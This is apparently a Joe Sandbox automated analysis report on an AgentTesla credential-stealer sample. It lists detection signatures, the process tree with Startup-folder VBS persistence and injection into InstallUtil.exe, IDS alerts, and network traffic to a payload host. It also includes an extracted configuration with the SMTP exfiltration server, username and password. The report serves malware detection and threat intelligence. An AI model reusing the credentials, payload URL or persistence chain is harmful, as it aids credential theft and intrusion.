Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#66001032.exe

Overview

General Information

Sample name:Ref#66001032.exe
Analysis ID:1584676
MD5:74e7fac7b65ef917ccf9a16a28e52663
SHA1:6b887463d02f2856fa48836e0a1f63744f77226d
SHA256:960629415a5344e8a50051bbf2808e39c4459074eb0b37d2b8704de13143a595
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Ref#66001032.exe (PID: 2736 cmdline: "C:\Users\user\Desktop\Ref#66001032.exe" MD5: 74E7FAC7B65EF917CCF9A16A28E52663)
    • EXCEL.EXE (PID: 6824 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx" MD5: 4A871771235598812032C822E6F68F19)
      • splwow64.exe (PID: 4100 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • InstallUtil.exe (PID: 6932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 5952 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Length.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Roaming\Length.exe" MD5: 74E7FAC7B65EF917CCF9A16A28E52663)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Ref#66001032.exe.42976b0.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Ref#66001032.exe.6420000.13.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  6.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    6.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      6.2.InstallUtil.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 11 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , ProcessId: 5952, ProcessName: wscript.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6932, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 61095
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs" , ProcessId: 5952, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#66001032.exe, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-06T07:54:55.095612+010020301711A Network Trojan was detected192.168.2.661095162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-06T07:56:27.254091+010028032742Potentially Bad Traffic192.168.2.6610895.253.86.15443TCP
                      2025-01-06T07:56:52.472470+010028032742Potentially Bad Traffic192.168.2.6610905.253.86.15443TCP
                      2025-01-06T07:56:55.141364+010028032742Potentially Bad Traffic192.168.2.6610925.253.86.15443TCP
                      2025-01-06T07:58:44.855354+010028032742Potentially Bad Traffic192.168.2.6611135.253.86.15443TCP
                      2025-01-06T07:59:00.192218+010028032742Potentially Bad Traffic192.168.2.6611145.253.86.15443TCP
                      2025-01-06T07:59:04.099842+010028032742Potentially Bad Traffic192.168.2.6611155.253.86.15443TCP
                      2025-01-06T07:59:08.089464+010028032742Potentially Bad Traffic192.168.2.6611165.253.86.15443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 6.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Length.exeReversingLabs: Detection: 34%
                      Multi AV Scanner detection for submitted file
                      Source: Ref#66001032.exeVirustotal: Detection: 38%Perma Link
                      Source: Ref#66001032.exeReversingLabs: Detection: 34%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Length.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Ref#66001032.exeJoe Sandbox ML: detected
                      Source: Ref#66001032.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61090 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61092 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:61094 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61106 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61113 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61114 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61115 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61116 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:61117 version: TLS 1.2
                      Source: Ref#66001032.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 4x nop then jmp 061D8662h0_2_061D86E2
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 4x nop then jmp 061D8662h0_2_061D8438
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 4x nop then jmp 061D8662h0_2_061D8429
                      Source: excel.exeMemory has grown: Private usage: 2MB later: 145MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:61095 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.6:61095 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.6:54840 -> 1.1.1.1:53
                      Source: global trafficTCP traffic: 192.168.2.6:60891 -> 1.1.1.1:53
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 5.253.86.15 5.253.86.15
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61092 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61089 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61090 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61113 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61115 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61116 -> 5.253.86.15:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:61114 -> 5.253.86.15:443
                      Source: global trafficTCP traffic: 192.168.2.6:61095 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficHTTP traffic detected: GET /YBbz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
                      Source: Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.mi
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.mic
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.micr
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.micros
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.microso
                      Source: excel_doc.xlsx.0.drString found in binary or memory: http://schemas.microsoft.
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: Ref#66001032.exe, Length.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
